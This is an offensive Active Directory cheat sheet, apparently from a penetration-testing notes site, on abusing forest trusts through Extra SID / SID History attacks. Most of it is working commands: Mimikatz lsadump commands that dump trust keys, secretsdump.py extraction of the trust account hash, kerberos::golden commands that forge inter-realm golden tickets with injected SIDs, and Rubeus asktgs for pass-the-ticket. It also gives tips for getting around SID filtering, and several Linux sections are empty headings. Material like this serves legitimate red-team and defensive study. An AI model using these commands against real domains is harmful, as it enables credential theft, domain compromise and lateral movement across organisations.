Forest to Forest - Extra SID (SID History \ TREAT_AS_EXTERNAL)
SID History Attacks
1) Get the trust key
Invoke-Mimikatz -Command '"lsadump::trust /patch"'Invoke-Mimikatz -Command '"lsadump::lsa /patch"'Linux
secretsdump.py -just-dc-user '<current_forest/target_forest$>' domain.local/Administrator:password@<DC>2) If no filtering: forge a referral ticket or an inter-realm Golden Ticket and request for a ST
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.local /sid:<current_domain_SID> /sids:<target_domain_SID>-<RID> /rc4:<key> /service:krbtgt /target:targetDomain.local /ticket:trust_forest.kirbi"'Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.local /sid:<current_domain_SID> /sids:<target_domain_SID>-<RID> /krbtgt:<krbtgt_hash> /ptt"'Invoke-Mimikatz -Command '"kerberos::golden /user:user1 /domain:domain.local /sid:<current_domain_SID> /id:<user1_RID> /rc4:<trust_key> /service:krbtgt /target:targetDomain.local /ticket:trust_forest.kirbi"'
./Rubeus.exe asktgs /ticket:trust_forest.kirbi /service:cifs/dc.targetDomain.local /dc:dc.targetDomain.local /pttLinux
3) If there is SID filtering, same thing as above but with RID > 1000 (for example, Exchange related groups are sometimes highly privileged, and always with a RID > 1000). Otherwise, get the foreignSecurityPrincipal. These users of the current domain are also members of the trusting forest, and they can be members of interesting groups:
Linux
1) Golden Ticket
OR
2) Trust Ticket
Get the trust ticket in the ntds (TARGET_DOMAIN$)
With both these attacks we perform lateral movement with Pass-the-Ticket
Last updated